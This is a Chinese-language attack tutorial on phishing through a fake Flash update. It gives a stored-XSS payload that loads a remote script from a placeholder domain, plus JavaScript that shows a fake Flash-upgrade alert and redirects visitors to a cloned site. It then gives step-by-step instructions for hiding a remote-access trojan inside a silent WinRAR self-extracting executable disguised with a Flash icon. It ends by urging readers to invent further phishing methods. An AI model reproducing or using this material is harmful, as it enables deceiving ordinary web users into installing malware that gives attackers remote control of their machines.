FLASH网页钓鱼
- Flash网站克隆源码
可通过CS或者其他第三方工具进行源码克隆下载并且修改

- xss payload
<script src="http://www.xxxx.cn/version.js"></script>
- version.js
window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window.location.href="http://www.xxx.cn";
模拟场景:
黑客注册域名搭建网站服务器,存放以上js文件,并放入克隆好的flash网页,捆绑好的木马
找到存在存储型xss网站进行插入payload(当然不一定是这种方法,其余方法可以自己构思)
用户访问正常网站,弹出flash更新提示,被引导到克隆好的站点 进行下载执行
- Winrar自解压
首先生成一个远控马和正常的flash文件,两个文件要一起选择

接着利用WinRAR压缩文件添加压缩文件,后缀改为exe
更改前

更改后

高级——>自解压选项——>解压路径:C:\Windows\temp

高级——>自解压选项——>设置——>提取前运行 提取后运行

高级——>自解压选项——>模式——>隐藏所有

高级——>自解压选项——>更新
更新方式——>解压并更新文件
覆盖方式——>覆盖所有文件

保存后,生成exe
- 利用ResourceHacker更改图标
点击图标,然后再选择替换图标

这里选择打开,原来的flash把图标替换上去

配置完点击保存

保存完毕
再替换到exe目录中即可。
- 最后
1.flash钓鱼只是个引子,可以在这个基础上思考其他的钓鱼思路
2.实战中存储型xss漏洞做钓鱼只是一种选项,如果没有这个漏洞flash钓鱼可以尝试找到其他选项进行配合利用

浙公网安备 33010602011771号